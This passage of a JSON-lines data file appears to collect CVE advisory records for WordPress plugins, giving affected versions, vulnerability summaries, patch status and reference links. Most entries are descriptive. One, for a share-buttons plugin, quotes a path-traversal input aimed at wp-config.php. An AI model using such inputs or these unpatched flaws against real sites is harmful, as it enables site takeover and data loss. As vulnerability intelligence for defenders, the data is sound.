replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/107548a1-3b5b-4838-815b-32b86e1b7ff5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/107548a1-3b5b-4838-815b-32b86e1b7ff5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkify-text\\\/tags\\\/1.9.1\\\/tests\\\/bootstrap.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linkify-text\\\/tags\\\/1.9.1\\\/tests\\\/bootstrap.php#L8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9071","slug":"easy-demo-importer","versionImpact":"1.1.2","description":"The Easy Demo Importer \u2013 A Modern One-Click Demo Import Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27a1f457-6bd9-41eb-83e1-cb9e62950041?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27a1f457-6bd9-41eb-83e1-cb9e62950041?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-demo-importer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-demo-importer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162305\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162305\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10852","slug":"buy-one-click-woocommerce","versionImpact":"2.2.9","description":"The Buy one click WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the buy_one_click_export_options AJAX action in all versions up to, and including, 2.2.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/230eb20c-2d0e-4056-b341-4c2db584b70a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/230eb20c-2d0e-4056-b341-4c2db584b70a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39431","slug":"amazon-showcase-wordpress-widget","versionImpact":"2.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Aaron Forgue Amazon Showcase WordPress Plugin allows Stored XSS. This issue affects Amazon Showcase WordPress Plugin: from n\/a through 2.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/amazon-showcase-wordpress-widget\\\/vulnerability\\\/wordpress-amazon-showcase-wordpress-plugin-plugin-2-2-csrf-to-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/amazon-showcase-wordpress-widget\\\/vulnerability\\\/wordpress-amazon-showcase-wordpress-plugin-plugin-2-2-csrf-to-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6755","slug":"game-users-share-buttons","versionImpact":"1.3.0","description":"The Game Users Share Buttons plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ajaxDeleteTheme() function in all versions up to, and including, 1.3.0. This makes it possible for Subscriber-level attackers to add arbitrary file paths (such as ..\/..\/..\/..\/wp-config.php) to the themeNameId parameter of the AJAX request, which can lead to remote code execution.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/game-users-share-buttons\\\/tags\\\/1.3.0\\\/game-users-share-buttons.php#L638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/game-users-share-buttons\\\/tags\\\/1.3.0\\\/game-users-share-buttons.php#L638\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/game-users-share-buttons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/game-users-share-buttons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f861ece5-21e4-4c7f-8701-bd9492b1b8bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f861ece5-21e4-4c7f-8701-bd9492b1b8bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0725","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_clone_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80797183-c69f-4dce-a2e0-52a395ceffaa\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80797183-c69f-4dce-a2e0-52a395ceffaa\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5177","slug":"vrm360","versionImpact":"1.2.1","description":"The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a67b9c21-a35a-4cdb-9627-a5932334e5f0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a67b9c21-a35a-4cdb-9627-a5932334e5f0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5506","slug":"imagemapper","versionImpact":"1.2.6","description":"The ImageMapper plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'imgmap_delete_area_ajax' function in versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts and pages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31dff395-c3ce-4ebe-8d38-5243fc4510d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31dff395-c3ce-4ebe-8d38-5243fc4510d6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imagemapper\\\/tags\\\/1.2.6\\\/imagemapper.php#L748\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-40606","slug":"kanban","versionImpact":"2.5.21","description":"Improper Control of Generation of Code ('Code Injection') vulnerability in Kanban for WordPress Kanban Boards for WordPress.This issue affects Kanban Boards for WordPress: from n\/a through 2.5.21.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-21-arbitrary-code-execution-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/kanban\\\/wordpress-kanban-boards-for-wordpress-plugin-2-5-21-arbitrary-code-execution-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7074","slug":"wp-social-bookmark-menu","versionImpact":"1.2","description":"The WP SOCIAL BOOKMARK MENU WordPress plugin through 1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7906c349-97b0-4d82-aef0-97a1175ae88e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7906c349-97b0-4d82-aef0-97a1175ae88e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7074.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7074.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1339","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the reinitialize function. This makes it possible for unauthenticated attackers to remove all plugin data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d08e462-8297-477e-89da-47f26bd6beae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d08e462-8297-477e-89da-47f26bd6beae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0385","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxAddCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add categories.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c7c74cf-a109-4f77-a740-5a43ccd4e96a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1896","slug":"new-photo-gallery","versionImpact":"1.4.1","description":"The Photo Gallery \u2013 Responsive Photo Gallery, Image Gallery, Portfolio Gallery, Logo Gallery And Team Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.1 via deserialization via shortcode of untrusted input from the 'awl_lg_settings_' attribute. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14894c36-f657-4368-bc7f-60121ec08c13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14894c36-f657-4368-bc7f-60121ec08c13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/new-photo-gallery\\\/tags\\\/1.4.0\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/new-photo-gallery\\\/tags\\\/1.4.0\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5149","slug":"buddyforms","versionImpact":"2.8.9","description":"The BuddyForms plugin for WordPress is vulnerable to Email Verification Bypass in all versions up to, and including, 2.8.9 via the use of an insufficiently random activation code. This makes it possible for unauthenticated attackers to bypass the email verification.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5c8d361-698b-4abd-bcdd-0361d3fd10c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5c8d361-698b-4abd-bcdd-0361d3fd10c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/tags\\\/2.8.9\\\/includes\\\/wp-insert-user.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buddyforms\\\/tags\\\/2.8.9\\\/includes\\\/wp-insert-user.php#L334\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8045","slug":"advanced-backgrounds","versionImpact":"1.12.3","description":"The Advanced WordPress Backgrounds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018imageTag\u2019 parameter in all versions up to, and including, 1.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e49869-5e7e-45f2-8239-4df18b28db53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78e49869-5e7e-45f2-8239-4df18b28db53?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/assets\\\/admin\\\/gutenberg\\\/index.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/assets\\\/admin\\\/gutenberg\\\/index.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-backgrounds\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-backgrounds\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/classes\\\/class-gutenberg.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/classes\\\/class-gutenberg.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/assets\\\/admin\\\/gutenberg\\\/block.json#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-backgrounds\\\/trunk\\\/assets\\\/admin\\\/gutenberg\\\/block.json#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147938\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147938\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10851","slug":"razorpay-payment-button","versionImpact":"2.4.6","description":"The Razorpay Payment Button Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.4.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c0e8e63-2603-4ee4-88f5-e132f9bc7fae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c0e8e63-2603-4ee4-88f5-e132f9bc7fae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button\\\/tags\\\/2.4.6\\\/includes\\\/rzp-payment-buttons.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button\\\/tags\\\/2.4.6\\\/includes\\\/rzp-payment-buttons.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button\\\/tags\\\/2.4.6\\\/includes\\\/rzp-subscription-buttons.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/razorpay-payment-button\\\/tags\\\/2.4.6\\\/includes\\\/rzp-subscription-buttons.php#L78\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12018","slug":"shortcode-variables","versionImpact":"4.1.6","description":"The Snippet Shortcodes plugin for WordPress is vulnerable to unauthorized Shortcode Deletion due to missing authorization in all versions up to, and including, 4.1.6. Note that a nonce is used as authentication here, but the value is leaked. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's Shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205481\\\/shortcode-variables\\\/trunk\\\/includes\\\/hooks.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205481\\\/shortcode-variables\\\/trunk\\\/includes\\\/hooks.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcode-variables\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcode-variables\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e6e8f68-6977-478a-b62e-0ec9385eb2af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e6e8f68-6977-478a-b62e-0ec9385eb2af?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12221","slug":"weaver-for-bbpress","versionImpact":"1.6.3","description":"The Turnkey bbPress by WeaverTheme plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018_wpnonce\u2019 parameter in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209473\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209473\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/weaver-for-bbpress\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/weaver-for-bbpress\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35c608c3-9c28-4e0d-b0ec-d0a279fccd3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35c608c3-9c28-4e0d-b0ec-d0a279fccd3b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39417","slug":"redirect-to-welcome-or-landing-page","versionImpact":"2.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in Eslam Mahmoud Redirect wordpress to welcome or landing page allows Stored XSS. This issue affects Redirect wordpress to welcome or landing page: from n\/a through 2.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/redirect-to-welcome-or-landing-page\\\/vulnerability\\\/wordpress-redirect-wordpress-to-welcome-or-landing-page-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/redirect-to-welcome-or-landing-page\\\/vulnerability\\\/wordpress-redirect-wordpress-to-welcome-or-landing-page-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5304","slug":"project-notebooks","versionImpact":"1.1.3","description":"The PT Project Notebooks plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization in the wpnb_pto_new_users_add() function in versions 1.0.0 through 1.1.3. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/project-notebooks\\\/tags\\\/1.1.3\\\/includes\\\/structure\\\/admin\\\/pto_admin_settings.php#L233\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/project-notebooks\\\/tags\\\/1.1.3\\\/includes\\\/structure\\\/admin\\\/pto_admin_settings.php#L233\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/project-notebooks\\\/tags\\\/1.1.3\\\/includes\\\/structure\\\/admin\\\/pto_admin_settings.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/project-notebooks\\\/tags\\\/1.1.3\\\/includes\\\/structure\\\/admin\\\/pto_admin_settings.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/project-notebooks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/project-notebooks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/552ec9fc-5bff-4bee-be04-39892c89cd59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/552ec9fc-5bff-4bee-be04-39892c89cd59?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0724","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_add_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08c0ea6c-7e2f-482f-b30c-0e3bcd992159\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08c0ea6c-7e2f-482f-b30c-0e3bcd992159\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0502","slug":"wp-news-magazine","versionImpact":"1.1.9","description":"The WP News WordPress plugin through 1.1.9 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c959f4ce-b6ea-4aee-9a98-aa98d2a62138\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c959f4ce-b6ea-4aee-9a98-aa98d2a62138\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3713","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.5.1","description":"The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'profile_magic_check_smtp_connection' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily. This can be used by attackers to achieve privilege escalation.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/admin\\\/class-profile-magic-admin.php#L599\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/admin\\\/class-profile-magic-admin.php#L599\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/473ba791-af99-4aae-99cb-ccf220e443e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/473ba791-af99-4aae-99cb-ccf220e443e7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
